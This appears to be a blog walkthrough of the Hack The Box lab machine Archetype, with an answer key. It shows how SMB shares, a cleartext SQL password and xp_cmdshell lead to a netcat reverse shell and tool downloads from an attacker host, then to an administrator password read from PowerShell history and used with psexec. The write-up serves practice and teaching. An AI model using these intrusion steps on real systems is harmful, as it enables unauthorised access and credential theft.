#12 ARCHETYPE - Starting Point - Hack the Box || Complete Walkthrough

Welcome to TIER II

Well done at reaching this point. From now on boxes are becoming a bit more difficult in the context of steps, usage of tools, and exploitation attempts as they start looking similar to the boxes in the main platform of HTB. Starting with Archetype which is a Windows machine, you can have a chance to exploit a misconfiguration in Microsoft SQL Server, try getting a reverse shell, and get familiarized with the use of the Impacket tool in order to further attack some services.


Enumeration

Performing a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool.

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.33.197
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 11:23 IST\
Nmap scan report for 10.129.33.197
Host is up (0.26s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
|_ssl-date: 2021-12-27T06:05:12+00:00; +10m43s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-12-27T06:00:49
|_Not valid after:  2051-12-27T06:00:49
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-12-27T06:05:00
|_  start_date: N/A
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-12-26T22:04:56-08:00
| ms-sql-info:
|   10.129.33.197:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017 
|       Service pack level: RTM 
|       Post-SP patches applied: false 
|_    TCP port: 1433 
|_clock-skew: mean: 1h46m43s, deviation: 3h34m40s, median: 10m42s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 63.76 seconds 

┌──(mrdev㉿mrdev)-[~]  
└─$

We found that SMB ports are open and also that a Microsoft SQL Server 2017 is running on port 1433. 


Enumerate Microsoft SQL server 2017 with the help of smbclient

We are going to enumerate the SMB with the tool smbclient.

  • -N : No password 
  • -L : This option allows you to look at what services are available on a server

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N -L \\\\10.129.33.197\\ 

Sharename       Type      Comment 
---------       ----      -------
ADMIN$          Disk      Remote Admin
backups         Disk  
C$              Disk      Default share
IPC$            IPC       Remote IPC  

SMB1 disabled -- no workgroup available

We located a couple of interesting shares. Shares ADMIN$ and C$ cannot be accessed as the Access Denied error states, however, we can try to access and enumerate the backups shared by using the following command:

┌──(mrdev㉿mrdev)-[~]
└─$ smbclient -N \\\\10.129.33.197\\backups
Try "help" to get a list of possible commands.
smb: \>  dir
.                                   D        0  Mon Jan 20 17:50:57 2020
..                                  D        0  Mon Jan 20 17:50:57 2020
prod.dtsConfig                     AR      609  Mon Jan 20 17:53:02 2020 
5056511 blocks of size 4096. 2611130 blocks available
smb: \> 

There is a file named prod.dtsConfig which seems like a configuration one. We can download it to our local machine by using the get command for further offline inspection.

smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
┌──(mrdev㉿mrdev)-[~]
└─$ ls
prod.dtsConfig

Open the file to inspect the content:

┌──(mrdev㉿mrdev)-[~]
└─$ cat prod.dtsConfig
<DTSConfiguration> <DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.; Password=M3g4c0rp123 ; User ID=ARCHETYPE\sql_svc ;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;
</ConfiguredValue> </Configuration> </DTSConfiguration>

By reviewing the content of this configuration file, we spot in clear text the password of the user ARCHETYPE\sql_svc, which is M3g4c0rp123, for the host ARCHETYPE. With the provided credentials we just need a way to connect and authenticate to the MS-SQL server.


Enumerate the ARCHETYPE using Impacket

Impacket tool includes a valuable Python script called mssqlclient.py which offers such functionality. But first, we should better understand what Impact is and how we can install it.

Visit the Impacket Github link by searching on Google, where you can read all about this tool. 

┌──(mrdev㉿mrdev)-[~]
┌──(mrdev㉿mrdev)-[~]
└─$ cd impacket 
pip3 install . 
# OR: 
sudo python3 setup.py install 
# In case you are missing some modules: 
pip3 install -r requirements.txt

You can find the mssqlclient.py file from the example directory.

┌──(mrdev㉿mrdev)-[~]
└─$ cd impacket/examples/
┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ ls
addcomputer.py      getPac.py       mssqlinstance.py      registry-read.py  smbrelayx.py
atexec.py           getST.py        netview.py            reg.py            smbserver.py
dcomexec.py         getTGT.py       nmapAnswerMachine.py  rpcdump.py        sniffer.py
dpapi.py            GetUserSPNs.py  ntfs-read.py          rpcmap.py         sniff.py
esentutl.py         goldenPac.py    ntlmrelayx.py         sambaPipe.py      split.py
exchanger.py        karmaSMB.py     ping6.py              samrdump.py       ticketConverter.py
findDelegation.py   kintercept.py   ping.py               secretsdump.py    ticketer.py
GetADUsers.py       lookupsid.py    psexec.py             services.py       wmiexec.py 
getArch.py          mimikatz.py     raiseChild.py         smbclient.py      wmipersist.py
Get-GPPPassword.py  mqtt_check.py   rbcd.py               smbexec.py        wmiquery.py
GetNPUsers.py       mssqlclient.py   rdp_check.py          smbpasswd.py 
┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ 

After understanding the options provided, we can try to connect to the MSSQL server using the below command:

┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ sudo ./mssqlclient.py ARCHETYPE/sql_svc@ 10.129.33.197  -windows-auth
[sudo] password for mrdev:
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
Password:

We provide the password we spotted previously in the configuration file:

Password:
[*] Encryption required, switching to TLS 
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

We successfully authenticated to the Microsoft SQL Server!


Foothold

After our successful connection, run help to find out the options of our SQL shell. The help option describes the very basic functionalities it offers.

SQL> help
lcd {path}                 - changes the current local directory to {path}
exit                       - terminates the server process (and this session)
enable_xp_cmdshell         - you know what it means
disable_xp_cmdshell        - you know what it means
xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
! {cmd}                    - executes a local shell cmd
SQL> 


Gain Foothold from SQL Shell

First, let me enable the XP command shell from 0 to 1. Then, run reconfigure. 

SQL> enable_xp_cmdshell;
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE; 
SQL>

The whoami command output reveals that the SQL Server is also running in the context of the user ARCHETYPE\sql_svc. However, this account doesn't seem to have administrative privileges on the host.

SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
SQL> 

Now, we will attempt to get a stable reverse shell. We will upload the nc64.exe binary to the target machine and execute an interactive cmd.exe process on our listening port. We can download the binary from GitHub.

Now copy this file to the htdocs of the XAMPP webserver. Now Run the control panel and start the Apache web server. My Apache server is running on port 8080.

In order to upload the binary in the target system, we need to find the appropriate folder for that. We will be using PowerShell for this task since it gives us much more features than the regular command prompt. 

In order to use it, we will have to specify it each time we want to execute it until we get the reverse shell. To do that, we will use the PowerShell -c command. 

  • -c flag instructs the PowerShell to execute the command.

We will print the current working directory by using pwd command.

SQL> xp_cmdshell "powershell -c pwd"
output 
--------------------------------------------------------------------------------
NULL 
Path
----
C:\Windows\system32
NULL
NULL
NULL

SQL>

Run the below command to upload the nc64.exe file to the download directory.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.62:8080/nc64.exe -outfile nc64.exe "
output
--------------------------------------------------------------------------------
NULL
SQL>

Now use the below command to get a reverse shell connection:

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.18 443"

Before that make sure you have started the Netcat listener on your host machine.

Microsoft Windows [Version 10.0.19044.1288] 
(c) Microsoft Corporation. All rights reserved.

C:\Users\mrdeveloper>cd ..
C:\Users>cd .. 
C:\>cd netcat-1.11
C:\netcat-1.11> nc -lvnp 443
listening on [any] 443 ...

Once you execute the XP Command shell You can find out a reverse shell.

Finally looking back at our Netcat listener we can confirm our reverse shell and our foothold to the system.

C:\netcat-1.11>nc -lvnp 443
listening on [any] 443 ... 
connect to [10.10.14.62] from (UNKNOWN) [10.129.33.197] 49676
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads>

The user flag can be found on the user's Desktop.

C:\Users\sql_svc\Downloads> cd ..
cd ..
C:\Users\sql_svc> cd Desktop
cd Desktop
C:\Users\sql_svc\Desktop> dir  
dir 
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Desktop  
01/20/2020  05:42 AM    <DIR>          . 
01/20/2020  05:42 AM    <DIR>          ..
02/25/2020  06:37 AM                32 user.txt
1 File(s)             32 bytes    
2 Dir(s)  10,683,121,664 bytes free 
C:\Users\sql_svc\Desktop> type user.txt  
3***************************3 


Privilege Escalation


Escalate Privilege using WinPEAS

For privilege escalation, we are going to use a tool called winPEAS, which can automate a big part of the enumeration process in the target system.

Let me change the directory to Downloads.

C:\Users\sql_svc\Desktop> cd .. 
cd ..  
C:\Users\sql_svc> cd Downloads   
cd Downloads 

Now visit the GitHub link and download the winPEAS.exe file. We will transfer it to our target system by using a once more xampp server.

  • Click Here to download: 

PEASS-ng

PEASS-ng (Privilege Escalation Awesome Scripts SUITE new generation) is a collection of privilege escalation tools and techniques for Windows and Linux/Unix systems. It provides scripts and binaries that aid in the process of escalating privileges on compromised machines.


On the target machine, we will execute the wget command in order to download the program from our system. We will use Powershell for all our commands.

C:\Users\sql_svc\Downloads> powershell wget http://10.10.14.62:8080/winPEASx64.exe -outfile winPEASx64.exe
powershell wget http://10.10.14.62:8080/winPEASx64.exe -outfile winPEASx64.exe

We successfully downloaded the binary:

Now execute it:

C:\Users\sql_svc\Downloads> .\winPEASx64.exe

The output of the tool is long, here you can find out some history, logs, and backups. From the output, we can observe that we have SeImpersonatePrivilege, which is also vulnerable to juicy potato exploit.

However, we can first check the two existing files where credentials could possibly be found.

As this is a normal user account as well as a service account, it is worth checking for frequently accessed files or executed commands. To do that, we will read the PowerShell history file, which is the equivalent of .bash_history for Linux systems. The file ConsoleHost_history.txt can be located in this directory.

Now, navigate to the folder where the PowerShell history is stored.

C:\Users\sql_svc\Downloads> cd ..  
cd ..   
C:\Users\sql_svc> cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine 
cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine  
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>dir 
dir     
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
01/20/2020  05:04 AM    <DIR>          .  
01/20/2020  05:04 AM    <DIR>          ..  
03/17/2020  01:36 AM                79 ConsoleHost_history.txt  
1 File(s)             79 bytes 
2 Dir(s)  10,718,646,272 bytes free    
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>

To read the file, we will input, type, and then the file which we want to read.

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt   
type ConsoleHost_history.txt     
net.exe use T: \\Archetype\backups /user: administrator MEGACORP_4dm1n!!   
exit
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>

As you can see, the administrator password i.e.,  MEGACORP_4dm1n!!


Get ADMINISTRATOR Aceess using PSEXEC

We can now use the tool psexec.py again from the Impacket suite to get a shell as the administrator.

┌──(mrdev㉿mrdev)-[~/impacket/examples]
└─$ sudo python3 psexec.py [email protected] 
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.33.197.....
[*] Found writable share ADMIN$
[*] Uploading file IXpjoSao.exe
[*] Opening SVCManager on 10.129.33.197.....  
[*] Creating service PpfF on 10.129.33.197.....
[*] Starting service PpfF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

The root flag can now be found on the Desktop of the Administrator user.

C:\Windows\system32> cd .. 
C:\Windows> cd ..   
C:\> cd Users/Administrator/Desktop 
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\Administrator\Desktop
07/27/2021  01:30 AM    <DIR>          .
07/27/2021  01:30 AM    <DIR>          ..
02/25/2020  06:36 AM                32 root.txt
1 File(s)             32 bytes 
2 Dir(s)  10,718,441,472 bytes free
C:\Users\Administrator\Desktop> type root.txt
b91ccec3*****************************8

Finally, we have managed to get both flags.


Task Answer


TASK 1: Which TCP port is hosting a database server?

Ans. 1433

TASK 2: What is the name of the non-administrative share available over SMB?

Ans. backups

TASK 3: What is the password identified in the file on the SMB share?

Ans. M3g4c0rp123

TASK 4: What script from the Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

Ans. mssqlclient.py

TASK 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

Ans. xp_cmdshell

TASK 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

Ans. winpeas

TASK 7: What file contains the administrator's password?

Ans. ConsoleHost_history.txt

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!